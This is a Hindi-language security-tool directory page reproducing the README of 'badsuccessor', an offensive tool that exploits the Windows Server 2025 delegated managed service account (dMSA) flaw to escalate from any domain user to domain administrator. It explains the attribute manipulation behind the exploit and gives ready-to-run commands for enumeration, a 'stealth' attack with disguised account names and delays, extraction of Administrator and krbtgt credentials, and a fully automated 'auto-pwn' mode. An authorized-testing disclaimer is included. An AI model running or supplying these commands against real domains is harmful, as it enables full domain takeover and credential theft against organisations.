Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
badsuccessor — Windows Server 2025 dMSA विशेषाधिकार वृद्धि भेद्यता का दोहन करके लिखने योग्य OU की सूची बनाता है, मनमाने डोमेन उपयोगकर्ताओं तक विशेषाधिकार बढ़ाता है, क्रेडेंशियल निकालता है, और अधिकृत AD सुरक्षा मूल्यांकनों में डोमेन टेकओवर सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/cybrly/badsuccessor
विशेषाधिकार वृद्धिटोहीस्थायित्व तंत्रशोषणपार्श्व आंदोलनजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगप्रतिकूल हमला
GitHubcybrly/badsuccessor
12220201 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

badsuccessor

Windows Server 2025 dMSA विशेषाधिकार वृद्धि भेद्यता का दोहन करके लिखने योग्य OU की सूची बनाता है, मनमाने डोमेन उपयोगकर्ताओं तक विशेषाधिकार बढ़ाता है, क्रेडेंशियल निकालता है, और अधिकृत AD सुरक्षा मूल्यांकनों में डोमेन टेकओवर सक्षम करता है।

रिपॉजिटरी देखें

BadSuccessor.py

एक पैठ परीक्षण उपकरण जो Windows Server 2025 Active Directory वातावरण में dMSA (प्रत्यायोजित प्रबंधित सेवा खाता) विशेषाधिकार वृद्धि भेद्यता का शोषण करता है।

⚠️ कानूनी अस्वीकरण

यह उपकरण केवल अधिकृत पैठ परीक्षण और सुरक्षा अनुसंधान उद्देश्यों के लिए है। स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध इस उपकरण का उपयोग अवैध और अनैतिक है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

⚠️ विकास स्थिति और पर्यावरणीय परीक्षण अस्वीकरण

महत्वपूर्ण: यह उपकरण सक्रिय विकास और परीक्षण के अधीन है।

वर्तमान स्थिति

  • Windows Server 2025 अपनाना: मई 2025 तक, Windows Server 2025 अभी भी प्रारंभिक अपनाने के चरण में है, जिसमें सीमित उत्पादन परिनियोजन हैं
  • पर्यावरणीय विविधताएँ: परीक्षण के लिए उपलब्ध Windows Server 2025 वातावरणों की सीमित संख्या के कारण, यह उपकरण अप्रयुक्त कॉन्फ़िगरेशन का सामना कर सकता है
  • निरंतर विकास: हम उपकरण को सक्रिय रूप से परिष्कृत कर रहे हैं क्योंकि अधिक पर्यावरणीय विविधताएँ परिनियोजित और परीक्षण की जाती हैं

इसका क्या अर्थ है

  • अपडेट की अपेक्षा करें: नए पर्यावरण प्रकारों के परीक्षण के रूप में उपकरण को लगातार अपडेट प्राप्त होंगे
  • मुद्दों की रिपोर्ट करें: आपकी प्रतिक्रिया महत्वपूर्ण है - कृपया किसी भी मुद्दे या किनारे के मामलों की रिपोर्ट करें जिनका आप सामना करते हैं
  • सावधानी से परीक्षण करें: पहले हमेशा गैर-उत्पादन वातावरण में परीक्षण करें
  • स्कीमा विविधताएँ: विभिन्न Windows Server 2025 बिल्ड dMSA विशेषताओं को अलग-अलग तरीके से लागू कर सकते हैं
  • फीचर स्थिरता: जबकि मुख्य कार्यक्षमता स्थिर है, कुछ सुविधाओं को विशिष्ट वातावरणों के लिए समायोजन की आवश्यकता हो सकती है

ट्रैक किए जा रहे ज्ञात चर

  • विभिन्न Windows Server 2025 बिल्ड संस्करण
  • स्कीमा विशेषता नामकरण परंपराएँ
  • क्षेत्रीय/स्थानीयकृत AD कार्यान्वयन
  • हाइब्रिड क्लाउड कॉन्फ़िगरेशन
  • विभिन्न AD कार्यात्मक स्तर
  • विभिन्न सुरक्षा हार्डनिंग कॉन्फ़िगरेशन

सामुदायिक परीक्षण

हम सुरक्षा समुदाय को प्रोत्साहित करते हैं:

  • विविध वातावरणों में परीक्षण करें
  • निष्कर्ष साझा करें (स्वच्छ)
  • संगतता सुधारों के लिए पुल अनुरोध सबमिट करें
  • पर्यावरणीय विविधताओं की रिपोर्ट करें

इस उपकरण का उपयोग करके, आप स्वीकार करते हैं कि यह सक्रिय विकास के अधीन है और आपके विशिष्ट वातावरण के लिए संशोधनों की आवश्यकता हो सकती है।

📋 अवलोकन

BadSuccessor Windows Server 2025 की प्रत्यायोजित प्रबंधित सेवा खाता (dMSA) सुविधा में विशेषाधिकार वृद्धि भेद्यता का शोषण करता है। यह भेद्यता न्यूनतम अनुमतियों वाले हमलावरों को डोमेन में किसी भी उपयोगकर्ता, जिसमें डोमेन व्यवस्थापक शामिल हैं, के लिए विशेषाधिकार बढ़ाने की अनुमति देती है।

अनुसंधान श्रेय

यह उपकरण Akamai Technologies से Yuval Gordon के उत्कृष्ट अनुसंधान पर आधारित है:

  • BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory

🎯 भेद्यता विवरण

यह भेद्यता dMSA प्रवासन प्रक्रिया में मौजूद है जहाँ:

  1. एक हमलावर किसी भी लिखने योग्य OU में एक दुर्भावनापूर्ण dMSA बनाता है
  2. msDS-ManagedAccountPrecededByLink या ms-DS-Managed-Account-Preceded-By-Link को लक्षित उपयोगकर्ता की ओर इंगित करने के लिए सेट करता है
  3. msDS-DelegatedMSAState या ms-DS-Delegated-MSA-State को 2 (प्रवासन पूर्ण) पर सेट करता है
  4. KDC स्वचालित रूप से PAC इनहेरिटेंस के माध्यम से dMSA को लक्षित उपयोगकर्ता के सभी विशेषाधिकार प्रदान करता है

इसके अतिरिक्त, KERB-DMSA-KEY-PACKAGE संरचना में लक्षित उपयोगकर्ता के पासवर्ड कुंजियाँ होती हैं, जिससे क्रेडेंशियल निष्कर्षण सक्षम होता है।

✅ पूर्वापेक्षाएँ

सिस्टम आवश्यकताएँ

  • Linux मशीन (डोमेन से जुड़ी नहीं)
  • Python 3.6+
  • लक्षित Active Directory वातावरण तक नेटवर्क पहुँच
  • लक्षित डोमेन में कम से कम एक Windows Server 2025 डोमेन नियंत्रक होना चाहिए

Python निर्भरताएँ```bash

pip3 install ldap3 pyasn1 pycryptodome pip3 install impacket==0.12.0

**नोट**: इस टूल का परीक्षण impacket 0.12.0 के साथ किया गया है। संस्करण संगतता चेतावनियाँ रनटाइम पर प्रदर्शित की जाती हैं।

### वैकल्पिक निर्भरताएँ```bash
# For DNS discovery
pip3 install dnspython

# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2

# RHEL/CentOS/Fedora
sudo yum install krb5-devel

आवश्यक अनुमतियाँ

  • मान्य डोमेन क्रेडेंशियल (कोई भी उपयोगकर्ता खाता)
  • निम्नलिखित में से कोई भी अनुमति कम से कम एक संगठनात्मक इकाई पर:
    • CreateChild अनुमति
    • Write अनुमति
    • GenericWrite अनुमति
    • GenericAll अनुमति
    • लेखन पहुंच वाले डिफ़ॉल्ट समूहों के सदस्य (जैसे, Authenticated Users)
  • उपकरण स्वचालित रूप से सभी लिखने योग्य OU की खोज करता है और विशिष्ट अनुमतियाँ दिखाता है

🚀 स्थापना```bash

git clone https://github.com/cybrly/badsuccessor.git cd badsuccessor pip3 install -r requirements.txt chmod +x badsuccessor.py

### requirements.txt```
ldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0

📖 उपयोग

मूल सिंटैक्स```bash

python3 badsuccessor.py -d -u -p [options]

### त्वरित प्रारंभ उदाहरण

#### 1. ड्राई रन मोड (नया) - बिना परिवर्तन किए परीक्षण करें```bash
# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator

# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"

2. पर्यावरण सूचीबद्ध करें```bash

Check Windows Server 2025 schema support

python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema

Find ALL writable OUs with detailed permissions

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate

List high-value targets

python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets

Validate specific target account

python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator

#### 3. आक्रमण करें```bash
# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator

# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30

# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
  --dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
  --dmsa-display-name "Production Service"

# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
  --dmsa-pattern "svc{random}prod"

4. क्रेडेंशियल निकालें```bash

Extract credentials for multiple users

python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql

Auto-pwn mode (fully automated)

python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn

#### 5. सत्र प्रबंधन (नया)```bash
# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions

# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234

# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID

# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all

6. परिणाम निर्यात करें (नया)```bash

Export enumeration results to JSON

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json

Export to CSV

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv

Generate HTML report

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html

टूल डाउनलोड करें